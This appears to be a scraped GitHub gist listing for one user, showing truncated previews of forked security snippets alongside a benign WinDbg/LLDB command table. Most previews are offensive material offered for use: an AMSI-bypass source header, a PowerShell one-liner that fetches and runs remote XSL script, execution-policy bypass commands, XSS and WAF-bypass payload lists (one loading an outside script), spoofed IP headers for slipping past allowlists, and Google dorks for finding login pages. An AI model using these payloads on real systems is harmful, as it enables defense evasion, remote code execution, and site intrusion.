| Command | WinDbg | LLDB |
|---|---|---|
| Start | windbg {executable} [{args}] |
lldb {executable} [--args] |
| Attach | windbg -p {pid} |
lldb --attach-pid {pid} |
| Command | WinDbg | LLDB |
|---|---|---|
| (Re)load symbols | lb {module-name} |
target symbols add {symbol-file-path} |
sharpicx
sharpicx
/ AmsiContextHook.cpp
Created
August 7, 2024 18:11
— forked from rxwx/AmsiContextHook.cpp
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <metahost.h> | |
| #include <comutil.h> | |
| #include <mscoree.h> | |
| #include "patch_info.h" | |
| #include "base\helpers.h" | |
| /** | |
| * For the debug build we want: |
sharpicx
/ PowerShell.txt
Created
July 14, 2024 18:37
— forked from S3cur3Th1sSh1t/PowerShell.txt
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################## | |
| ### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/966172175555284992] | |
| $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
| ############################################################################## | |
| ### Powershell VBScript Assembly SCT "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/965670898379476993] |
sharpicx
/ PowershellBypass.ps1
Created
July 14, 2024 18:13
— forked from adithyan-ak/PowershellBypass.ps1
Bypass the PowerShell Execution Policy Restrictions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ | |
| powershell.exe -ExecutionPolicy Bypass | |
| PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 | |
| PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1 | |
| PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1 | |
| Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile - | |
| powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA | |
| Set-ExecutionPolicy Bypass -Scope Process |
sharpicx
/ WinDbg and LLDB commands.md
Created
November 29, 2023 03:53
— forked from rafaelldi/WinDbg and LLDB commands.md
WinDbg and LLDB commands
sharpicx
/ xss_cheatsheet.md
Created
May 5, 2023 22:36
— forked from abaykan/xss_cheatsheet.md
Full List of XSS Cheatsheet
<!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
sharpicx
/ gist:5fbad682a91f008b2d4f007ff73eb0fe
Created
April 13, 2023 06:39
— forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
Possible IP Bypass HTTP Headers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |
sharpicx
/ bypass waf by http headers
Created
April 12, 2023 21:39
— forked from wh1t3p1g/bypass waf by http headers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - X-forwarded-for | |
| - X-remote-IP | |
| - X-originating-IP | |
| - x-remote-addr | |
| waf通常会有一个不拦截任意请求的白名单ip,上面的几个头可以用来伪造ip | |
| 如: | |
| X-Forwarded-For: 127.0.0.1 | |
| X-Remote-Ip: 127.0.0.1 | |
| X-Originating-Ip: 127.0.0.1 | |
| X-Remote-Addr: 127.0.0.1 |
sharpicx
/ xss-bypass-waf
Created
April 12, 2023 21:39
— forked from zetc0de/xss-bypass-waf
XSS Bypass WAF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @vanshitmalhotra | Bypass AWS WAF -// | |
| Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
| eg: <!<script>confirm(1)</script> | |
| @black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
| <img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
| DotDefender WAF bypass by @0xInfection | |
| <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
sharpicx
/ xxsfilterbypass.lst
Created
April 12, 2023 21:39
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
sharpicx
/ google-dorks.txt
Created
November 4, 2022 19:30
— forked from dexit/google-dorks.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site:*/sign-in | |
| site:*/account/login | |
| site:*/forum/ucp.php?mode=login | |
| inurl:memberlist.php?mode=viewprofile | |
| intitle:"EdgeOS" intext:"Please login" | |
| inurl:user_login.php | |
| intitle:"Web Management Login" | |
| site:*/users/login_form | |
| site:*/access/unauthenticated | |
| site:account.*.*/login |
NewerOlder